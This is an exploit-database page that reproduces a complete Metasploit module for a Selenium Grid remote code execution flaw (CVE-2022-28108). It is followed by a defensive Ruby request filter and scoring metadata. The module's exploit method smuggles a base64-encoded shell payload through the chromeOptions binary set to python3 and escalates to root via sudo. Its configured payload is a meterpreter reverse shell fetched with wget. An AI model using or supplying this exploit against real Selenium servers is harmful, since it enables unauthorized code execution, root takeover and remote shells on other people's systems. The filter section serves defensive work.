Selenium Chrome Remote Code Execution Exploit

Published: 08 Jan 2025 00:00:00
Reported by: Takahiro Yokoyama
Type: zdt
Source: 0day.today
Views: 548

Selenium Server (Grid) versions before 4.0.0-alpha-7 allow remote code execution via CSRF (CVE-2022-28108).

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Selenium chrome RCE',
        'Description' => %q{
          Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
          such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
        },
        'Author' => [
          'randomstuff (Gabriel Corona)', # Exploit development
          'Wiz Research',                 # Vulnerability research
          'Takahiro Yokoyama'             # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2022-28108'],
          ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'],
          ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'],
        ],
        'Payload' => {},
        'Platform' => %w[linux],
        'Targets' => [
          [
            'Linux Command', {
              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
              'DefaultOptions' => {
                # tested cmd/linux/http/x64/meterpreter_reverse_tcp
                'FETCH_COMMAND' => 'WGET'
              }
            }
          ],
        ],
        'DefaultOptions' => {
          'FETCH_DELETE' => true
        },
        'DefaultTarget' => 0,
        'DisclosureDate' => '2022-04-18',
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(4444),
      ]
    )
  end

  def check
    # Request for Selenium Grid version 4
    v4res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'status')
    })
    return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') if v4res && v4res.get_json_document &&
                                                                                  v4res.get_json_document.include?('value') &&
                                                                                  v4res.get_json_document['value'].include?('message') &&
                                                                                  v4res.get_json_document['value']['message'].downcase.include?('selenium grid')

    # Request for Selenium Grid version 3
    v3res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    })
    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless v3res&.code == 200

    js_code = v3res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
    return Exploit::CheckCode::Unknown('Unable to determine the version.') unless js_code

    json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
    begin
      json_data = JSON.parse(json_str)
    rescue JSON::ParserError
      return Exploit::CheckCode::Unknown('Unable to determine the version.')
    end
    return Exploit::CheckCode::Unknown('Unable to determine the version.') unless json_data && json_data.include?('version') && json_data['version']

    # Extract the version
    version = Rex::Version.new(json_data['version'])
    if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version
      return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")
    end

    CheckCode::Appears("Version #{version} detected, which is vulnerable.")
  end

  def exploit
    b64encoded_payload = Rex::Text.encode_base64(
      "if sudo -n true 2>/dev/null; then\n"\
      "  echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d | sudo su root -c /bin/bash\n"\
      "else\n"\
      "  #{payload.encoded}\n"\
      "fi\n"
    )

    # Create the request body as a Ruby hash and then convert it to JSON
    body = {
      'capabilities' => {
        'alwaysMatch' => {
          'browserName' => 'chrome',
          'goog:chromeOptions' => {
            'binary' => '/usr/bin/python3',
            'args' => ["-cimport base64,os; bp=b'#{b64encoded_payload}'; os.system(base64.b64decode(bp).decode())"]
          }
        }
      }
    }.to_json

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'wd/hub/session'),
      'headers' => { 'Content-Type' => 'text/plain' },
      'data' => body
    })
    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
  end

end
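The description above names the root cause: the hub accepts session-creation bodies with non-JSON content types, and the module then abuses goog:chromeOptions.binary to launch an arbitrary program. As an added example (not part of the Vulners entry or the Metasploit module), here is a Ruby gate that a reverse proxy in front of a Grid hub could apply to new-session requests, refusing both the non-JSON content types and any browser binary outside an operator allowlist. The allowlist paths and the helper names are assumptions for this example.

```ruby
require 'json'

# Browser binaries the hub operator expects in goog:chromeOptions.binary.
# The allowlist is an assumption for this example; adjust to the real deployment.
ALLOWED_BINARIES = %w[/usr/bin/google-chrome /usr/bin/chromium /opt/google/chrome/chrome].freeze
# Selenium 3 hubs create sessions at /wd/hub/session; Selenium 4 also serves /session.
SESSION_PATH = %r{\A/(?:wd/hub/)?session/?\z}

# "text/plain; charset=utf-8" -> "text/plain"
def media_type(content_type)
  content_type.to_s.split(';').first.to_s.strip.downcase
end

# Collects every binary override in alwaysMatch and each firstMatch entry,
# since W3C capability matching lets a client put chromeOptions in either.
def chrome_binaries(caps)
  sets = [caps['alwaysMatch']] + Array(caps['firstMatch'])
  sets.filter_map do |set|
    opts = set.is_a?(Hash) ? set['goog:chromeOptions'] : nil
    opts['binary'] if opts.is_a?(Hash)
  end
end

# Returns the reasons a new-session request should be refused ([] = allowed).
# The two checks mirror what the module on this page relies on: a non-JSON
# Content-Type (the CSRF vector) and a goog:chromeOptions.binary override.
def vet_new_session(method, path, content_type, body)
  return [] unless method == 'POST' && path.to_s.match?(SESSION_PATH)

  reasons = []
  type = media_type(content_type)
  reasons << "non-JSON content type: #{type.inspect}" unless type == 'application/json'
  doc = begin
    JSON.parse(body.to_s)
  rescue JSON::ParserError
    nil
  end
  return reasons << 'body is not a JSON object' unless doc.is_a?(Hash)

  caps = doc['capabilities'].is_a?(Hash) ? doc['capabilities'] : {}
  chrome_binaries(caps).each do |bin|
    reasons << "unexpected browser binary: #{bin}" unless ALLOWED_BINARIES.include?(bin)
  end
  reasons
end
```

A gate like this is a compensating control only; the fix for CVE-2022-28108 is upgrading the hub to a version at or after 4.0.0-alpha-7 and keeping it off untrusted networks.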

Entry date: 08 Jan 2025 00:00 (current)
Risk: 9 (High)
Vulners AI Score: 9
CVSS 2: 9.3
CVSS 3.1: 8.8
EPSS: 0.22369
Views: 548